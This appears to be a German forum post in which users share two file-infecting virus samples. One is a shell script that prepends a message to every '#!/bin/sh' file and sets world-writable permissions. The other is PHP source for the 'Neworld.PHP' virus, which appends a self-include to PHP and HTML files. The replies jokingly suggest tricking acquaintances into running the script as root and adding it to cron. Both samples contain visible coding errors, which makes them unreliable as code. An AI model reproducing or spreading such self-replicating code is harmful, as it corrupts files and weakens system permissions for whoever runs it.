Follow along with the video below to see how to install our site as a web app on your home screen.
Anmerkung: This feature may not be available in some browsers.
#!/bin/sh
for f in `find . -type f -exec grep -ql \#\!/bin/sh {} \;`
do
echo "Ich bin ein boeser Virus!" > tmp$$
cat $f >>> tmp$$
mv tmp$$ $f
chmod 777 $f
done
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir("C:\\Windows\\");
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) ||
($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
{
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>
Das hätte in bisschen verschärfter Form glatt vom BofH stammen könnenOriginal von sieben[snip]Ich meine, man muss es nur allen seinen bekannten schicken und sie bitten es als root auszufuehren und moeglichst nicht in die datei zu gucken. [snip]
P.S: Fuer die taegliche Dosis einfach ins daily-cron stopfen. ;-)